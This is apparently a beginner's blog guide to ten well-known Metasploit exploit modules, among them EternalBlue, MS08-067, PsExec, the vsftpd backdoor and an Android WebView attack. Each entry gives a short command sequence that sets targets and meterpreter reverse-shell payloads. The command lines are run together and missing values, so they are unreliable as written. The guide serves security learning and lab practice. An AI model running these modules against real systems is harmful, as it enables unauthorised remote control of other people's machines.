Top 10 Metasploit Exploits Every Ethical Hacker Should Know
Are you curious about how ethical hackers break into systems — legally and ethically? Metasploit is one of the most popular tools used in cybersecurity for testing and finding weaknesses in systems. Think of it like a hacking toolbox — it gives you everything you need to try out real-world attacks in a safe way.
In this beginner-friendly guide, we’ll look at the 10 most used Metasploit exploits. For each one, you’ll learn:
-
What it is
-
What it does (in plain English)
-
How to use it step-by-step
Whether you’re studying cybersecurity, doing a Capture the Flag (CTF), or just learning for fun, this guide will help you get started with confidence
1. EternalBlue (ms17_010_eternalblue)
CVE: CVE-2017-0144
What It Does: Targets a bug in Windows file sharing and gives you remote control of the system — no login needed.
Famous For: The WannaCry ransomware attack
Command Example:
use exploit/windows/smb/ms17_010_eternalblue set RHOSTset PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST exploit
Why It’s Useful: You get full access to the target system without needing a username or password.
2. NetAPI Buffer Overflow (ms08_067_netapi)
CVE: CVE-2008-4250
What It Does: Crashes an old Windows service in a way that lets you run your own code.
Command Example:
use exploit/windows/smb/ms08_067_netapi set RHOSTset PAYLOAD windows/meterpreter/reverse_tcp set LHOST exploit exploit
Why It’s Useful: Still works on outdated systems and is great for learning.
3. PsExec (psexec)
What It Does: Lets you run commands on a Windows machine if you already have a valid username and password.
Command Example:
use exploit/windows/smb/psexec set RHOSTset SMBUser set SMBPass set PAYLOAD windows/meterpreter/reverse_tcp set LHOST exploit
Why It’s Useful: Excellent for moving deeper into a network once you’ve cracked one machine.
4. Java Signed Applet (java_signed_applet)
What It Does: Creates a fake Java pop-up. If the user clicks “Run,” you gain access to their system.
Command Example:
use exploit/multi/browser/java_signed_applet set SRVHOSTset URIPATH / set PAYLOAD java/meterpreter/reverse_tcp set LHOST exploit
Why It’s Useful: Great example of combining hacking with social engineering.
5. Multi/Handler (multi/handler)
What It Does: It doesn’t hack anything directly. It waits for a hacked system to call you back.
Command Example:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOSTset LPORT exploit
Why It’s Useful: Must-have for receiving reverse shells after sending a payload
6. VSFTPD Backdoor (vsftpd_234_backdoor)
What It Does: Targets a secret backdoor in a specific version of an FTP server used on Linux.
Command Example:
use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTexploit
Why It’s Useful: Easy way to get a shell on a vulnerable machine. Common in practice labs.
7. phpMyAdmin LFI (phpmyadmin_lfi_rce)
What It Does: Uses a flaw in phpMyAdmin to run your code on the web server.
Command Example:
use exploit/multi/http/phpmyadmin_lfi_rce set RHOSTset TARGETURI /phpmyadmin exploit
Why It’s Useful: Useful for attacking poorly configured web servers.
8. HFS Remote Code Execution (rejetto_hfs_exec)
What It Does: Takes advantage of a bug in an old Windows file server to run your own code.
Command Example:
use exploit/windows/http/rejetto_hfs_exec set RHOSTset TARGETURI / set PAYLOAD windows/meterpreter/reverse_tcp set LHOST exploit
Why It’s Useful: Easy shell access. Often used in CTF and training challenges.
9. Samba Usermap Script (samba_usermap_script)
What It Does: Attacks Linux file-sharing services that are misconfigured, letting you run commands.
Command Example:
use exploit/multi/samba/usermap_script set RHOSTset PAYLOAD cmd/unix/reverse set LHOST exploit
Why It’s Useful: No need for login. Works on vulnerable Linux systems.
10. Android WebView Exploit (webview_addjavascriptinterface)
What It Does: Lets you control Android phones running old apps with insecure browser settings.
Command Example:
use exploit/android/browser/webview_addjavascriptinterface set SRVHOSTset URIPATH / set PAYLOAD android/meterpreter/reverse_tcp set LHOST exploit
Why It’s Useful: Shows how mobile devices can be hacked through malicious websites.
Metasploit is a great tool for learning how hackers think and act — but always use it ethically and legally. If you’re new to cybersecurity, start with safe environments like TryHackMe, Hack The Box, or your own virtual machine setup.
These 10 Metasploit exploits are not only commonly used, but also essential for building hands-on skills in ethical hacking.